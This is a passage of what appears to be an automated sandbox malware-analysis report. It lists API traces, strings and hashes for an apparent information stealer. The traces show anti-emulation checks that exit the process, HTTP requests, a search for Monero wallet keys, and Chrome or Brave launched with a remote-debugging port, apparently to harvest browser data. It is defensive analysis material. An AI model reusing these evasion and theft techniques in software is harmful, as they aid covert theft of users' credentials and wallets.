                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00988A80,?,00F510F4,?,00000000,?,00F510F8,?,00000000,00F50AF3), ref: 00F46D6A
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F46D88
                            • CloseHandle.KERNEL32(00000000), ref: 00F46D99
                            • Sleep.KERNEL32(00001770), ref: 00F46DA4
                            • CloseHandle.KERNEL32(?,00000000,?,00988A80,?,00F510F4,?,00000000,?,00F510F8,?,00000000,00F50AF3), ref: 00F46DBA
                            • ExitProcess.KERNEL32 ref: 00F46DC2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                            • String ID:
                            • API String ID: 941982115-0
                            • Opcode ID: fdca5f5651ca46a8d2037bbb599502b68cd33605126a209bce4cd36af928edff
                            • Instruction ID: 086ec2a94207cc31ac2fca6b2891bc69ca25f28bb9d891a40593d43dc2af7c9f
                            • Opcode Fuzzy Hash: fdca5f5651ca46a8d2037bbb599502b68cd33605126a209bce4cd36af928edff
                            • Instruction Fuzzy Hash: 4AF01270E44609AFEB11BBA0EC4ABBE7F74AF05711F100615BD12E51C6CBB46900EB56

                            Control-flow Graph

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F34889
                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00F34899
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1274457161-4251816714
                            • Opcode ID: abf16be70164e70c3fba105b6173b86e8d9905cff52c88fe6c17e4c3550538b2
                            • Instruction ID: d767e8acdab1592d7f06e67294c6989ce50f224f1abf06c29c6e85ba7ca9eda4
                            • Opcode Fuzzy Hash: abf16be70164e70c3fba105b6173b86e8d9905cff52c88fe6c17e4c3550538b2
                            • Instruction Fuzzy Hash: C4216FB1D00208ABDF14DFA4EC4AADE7B75FB44320F108625F915A72C1EB706A09CF91

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                              • Part of subcall function 00F362D0: InternetOpenA.WININET(00F50DFF,00000001,00000000,00000000,00000000), ref: 00F36331
                              • Part of subcall function 00F362D0: StrCmpCA.SHLWAPI(?,0098E540), ref: 00F36353
                              • Part of subcall function 00F362D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F36385
                              • Part of subcall function 00F362D0: HttpOpenRequestA.WININET(00000000,GET,?,0098DA70,00000000,00000000,00400100,00000000), ref: 00F363D5
                              • Part of subcall function 00F362D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F3640F
                              • Part of subcall function 00F362D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F36421
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F45478
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                            • String ID: ERROR$ERROR
                            • API String ID: 3287882509-2579291623
                            • Opcode ID: 183256b6519288ccebbb1fbdb40f4b0c13979b4203a97b93011e22cfca5b7c7d
                            • Instruction ID: 5f10bfba58ccdf67b4dc453ceb70c7793254b02b6a74e65615c368cacca4189e
                            • Opcode Fuzzy Hash: 183256b6519288ccebbb1fbdb40f4b0c13979b4203a97b93011e22cfca5b7c7d
                            • Instruction Fuzzy Hash: 31116531940008ABEB14FFA4DD92EED7B39AF50350F404558FD1A5B492EF38AB08EB52

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1493 f31220-f31247 call f48b40 GlobalMemoryStatusEx 1496 f31273-f3127a 1493->1496 1497 f31249-f31271 call f4dd30 * 2 1493->1497 1499 f31281-f31285 1496->1499 1497->1499 1501 f31287 1499->1501 1502 f3129a-f3129d 1499->1502 1504 f31292-f31294 ExitProcess 1501->1504 1505 f31289-f31290 1501->1505 1505->1502 1505->1504
                            APIs
                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00F3123E
                            • ExitProcess.KERNEL32 ref: 00F31294
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 803317263-2766056989
                            • Opcode ID: 0cb9320ee0a1a64e212606a0a9810d2dddba9267646820793001e5c4577814b8
                            • Instruction ID: 934d56740b3cbfd3a4431a186169768bc634e3faeefd8006dedf37722ccae73c
                            • Opcode Fuzzy Hash: 0cb9320ee0a1a64e212606a0a9810d2dddba9267646820793001e5c4577814b8
                            • Instruction Fuzzy Hash: F9011DB0D40308FAEB10EFE4DC4ABAEBB78BB14715F208548EA04B61C1D67895459759
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F47AA0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F47AA7
                            • GetComputerNameA.KERNEL32(?,00000104), ref: 00F47ABF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 495c23b523d17b4c3d6112a56f91240325f1f0ce07eb9117d6373047e2c9c2d9
                            • Instruction ID: 515fedde3c71ef9428d2f8ab07d908de8e981ffd414d0d4daaff1fc58834790a
                            • Opcode Fuzzy Hash: 495c23b523d17b4c3d6112a56f91240325f1f0ce07eb9117d6373047e2c9c2d9
                            • Instruction Fuzzy Hash: F40186B1A08349AFC710DF98DD45BAEBBB8F704715F100219F945E3280D7745A0097A1
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00F3112B
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00F31132
                            • ExitProcess.KERNEL32 ref: 00F31143
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AllocCurrentExitNumaVirtual
                            • String ID:
                            • API String ID: 1103761159-0
                            • Opcode ID: f7bf57507ccd26f6662b398420ab2806915cd4d07a9a32a876551b1ac36406b8
                            • Instruction ID: 8cc4a8b8b28687d877384e335d297aac7b3fd3579be6a58dd0169b4f0d1ea5ce
                            • Opcode Fuzzy Hash: f7bf57507ccd26f6662b398420ab2806915cd4d07a9a32a876551b1ac36406b8
                            • Instruction Fuzzy Hash: F1E01D70D4530CFFE7216B90ED0EB4D767CAB04B15F100255F709761C5C6B535405759
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00F310B3
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00F310F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: 688397cd900a9f736d6602573b022d6a8f73bd41f1f74d35ec6859868f4b52d4
                            • Instruction ID: 858e2734ad28516633df871be48f4b6662e1563b64d996c0526886545eec9600
                            • Opcode Fuzzy Hash: 688397cd900a9f736d6602573b022d6a8f73bd41f1f74d35ec6859868f4b52d4
                            • Instruction Fuzzy Hash: A0F0E2B1641208BBE7289AA4AC5DFAEB7A8F705B14F300548F940E7280D571AE00DBA0
                            APIs
                              • Part of subcall function 00F47A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F47AA0
                              • Part of subcall function 00F47A70: RtlAllocateHeap.NTDLL(00000000), ref: 00F47AA7
                              • Part of subcall function 00F47A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00F47ABF
                              • Part of subcall function 00F479E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F311B7), ref: 00F47A10
                              • Part of subcall function 00F479E0: RtlAllocateHeap.NTDLL(00000000), ref: 00F47A17
                              • Part of subcall function 00F479E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F47A2F
                            • ExitProcess.KERNEL32 ref: 00F311C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AllocateName$ComputerExitUser
                            • String ID:
                            • API String ID: 3550813701-0
                            • Opcode ID: 8baefed9a21826357f0fe4372c7422217ad4cebd4df2fdeebd722311845d6df7
                            • Instruction ID: 0a122bbae6ddd045cb414c41bd117234be440facc4f51d9fab5a1d7881fa0438
                            • Opcode Fuzzy Hash: 8baefed9a21826357f0fe4372c7422217ad4cebd4df2fdeebd722311845d6df7
                            • Instruction Fuzzy Hash: 9FE017A5D0430167DA20B7B4BC0BB6F3A8CAB5476AF000918FE0982547EE29F811A275
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                            • FindFirstFileA.KERNEL32(00000000,?,00F50B32,00F50B2F,00000000,?,?,?,00F51450,00F50B2E), ref: 00F3BEC5
                            • StrCmpCA.SHLWAPI(?,00F51454), ref: 00F3BF33
                            • StrCmpCA.SHLWAPI(?,00F51458), ref: 00F3BF49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00F3C8A9
                            • FindClose.KERNEL32(000000FF), ref: 00F3C8BB
                            Strings
                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 00F3C495
                            • Google Chrome, xrefs: 00F3C6F8
                            • \Brave\Preferences, xrefs: 00F3C1C1
                            • Brave, xrefs: 00F3C0E8
                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 00F3C3B2
                            • Preferences, xrefs: 00F3C104
                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 00F3C534
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 3334442632-1869280968
                            • Opcode ID: f18af6e46dc188bae49a0c96dc127068e216d1d811bba3fd0efdce6aa217b51b
                            • Instruction ID: 877ddae1533ef045251b6df23029cdd1d09f27d8ed7fd0c522d38cc3d9294b2b
                            • Opcode Fuzzy Hash: f18af6e46dc188bae49a0c96dc127068e216d1d811bba3fd0efdce6aa217b51b
                            • Instruction Fuzzy Hash: 9E5259729501189BDB15FB70DD96EEE773DAF94300F404598F90666081EF38AB48DFA2
                            APIs
                            • wsprintfA.USER32 ref: 00F43B1C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00F43B33
                            • lstrcat.KERNEL32(?,?), ref: 00F43B85
                            • StrCmpCA.SHLWAPI(?,00F50F58), ref: 00F43B97
                            • StrCmpCA.SHLWAPI(?,00F50F5C), ref: 00F43BAD
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00F43EB7
                            • FindClose.KERNEL32(000000FF), ref: 00F43ECC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
